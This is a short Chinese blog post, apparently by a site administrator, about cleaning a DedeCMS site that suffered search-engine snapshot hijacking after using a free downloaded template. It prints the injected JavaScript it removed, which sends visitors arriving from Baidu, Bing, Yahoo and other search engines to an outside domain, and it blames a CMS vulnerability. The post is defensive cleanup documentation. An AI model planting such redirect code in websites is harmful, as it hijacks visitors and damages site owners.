文章目录[隐藏]
最近公司另外一个网站被快照劫持(原因是使用网上下载的免费的dedecms网站模板)
解决方法
删除恶意代码
document.writeln("<script LANGUAGE=\"Javascript\">");
document.writeln("var s=document.referrer");
document.writeln("if(s.indexOf(\"baidu\")>0 || s.indexOf(\"sogou\")>0 || s.indexOf(\"soso\")>0 ||s.indexOf(\"sm\")>0 ||s.indexOf(\"uc\")>0 ||s.indexOf(\"bing\")>0 ||s.indexOf(\"yahoo\")>0 ||s.indexOf(\"so\")>0 )");
document.writeln("location.href=\"https://www.136415.com\";");
document.writeln("</script>");
通过和最初代码版本查询,这个串代码是网站挂马上传后出现的。因此初步原因是dedecms 网站漏洞。